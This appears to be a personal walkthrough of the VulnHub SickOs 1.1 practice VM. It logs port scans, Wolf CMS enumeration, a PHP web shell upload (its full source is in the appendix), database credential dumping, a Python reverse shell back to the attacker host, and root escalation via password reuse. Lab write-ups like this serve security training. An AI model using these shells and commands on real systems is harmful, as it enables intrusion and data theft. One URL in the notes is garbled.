vulnhub.com sickos1.1

host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log

  # 2015/12/26 19:00 -> 19:40 (40min)

  # 2015/12/26 22:10 -> 23:50 (1hr 40min)

  # 2015/12/27 18:20 -> 18:40 (20min)

  # total time = 2hr 40min)



* discovery - target

  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24

  * found: 192.168.56.102



* discovery - services

  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102

  * found: port 22/tcp ssh, 3128/tcp squid, 8080/tcp ??

  * !!exploit-db did not reveal much

  * tried: nc -n -v 192.168.56.102 3128

  * with GET /

    * found: invalid URL error

  * with GET http://127.0.0.1/

    * found: landing page with BLEHHH!!! and PHP/5.3.10-1ubuntu3.21

  * using proxy: export http_proxy="http://192.168.56.102:3128"

  * wget http://192.168.56.102/robots.txt

  * found http://192.168.56.102/wolfcms

  * !!decided to use iceweasel with proxy instead of command line

    * did not find generator metatag

    * downloaded wolfcms

      * found: README.md, requested http://192.168.56.102/wolfcms/README.md

      * found: version = 0.8.2

      * found: , requested http://192.168.56.102/wolfcms/wolf/plugins/file_manager/file_manager.css

      * found: http://192.168.56.102/wolfcms/wolf/plugins/ is also browseable

      * found: that file_manager plugin is installed

    * read 

      - https://www.wolfcms.org/download/security-patches.html

      - http://www.securityfocus.com/archive/1/521797

      - https://www.exploit-db.com/exploits/36818/

      - https://packetstormsecurity.com/files/133011/Wolf-CMS-0.8.2-Open-Redirect.html 

      - https://github.com/wolfcms/wolfcms/issues/619

    * vulnerabilities

      * file upload

      * open redirect

    * stupidly tried admin/admin

    * uploaded shell.php using file uploaded

    * http://192.168.56.102/wolfcms/public/shell.php?cmd=id

    * used shell.php 

      * found: config.php using curl http://192.168.56.ll.php -d cmd="cat ../config.php"

      * found: mysql db=wolf, username=root, password=john@123

    * used curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=mysqldump -u root -pjohn@123 mysql"

      * found:

    * used shell.php to list directories

      * found: /var/www/connect.py

    * attempted python reverse shell

      * kali - nc -vvv -l -p 1234

      * sickos - curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.101\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'"

    * attempted to get tty, inside reverse shell

      * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

    * tried to use su - sickos, using the mysql password john@123, worked!!

    * sudo bash

    * ls -l /root

    * cat a0216ea4d51874464078c618298b1367.txt

    





* appendix



// shell.php

-- start of shell.php --

<?php

if(isset($_REQUEST['cmd']))

{

  $cmd = $_REQUEST['cmd'];

  system($cmd);

  echo "<pre>$cmd</pre>";

}

else

{

  echo "<pre>usage: ?cmd=</pre>";

}

?>

-- end of shell.php --

See also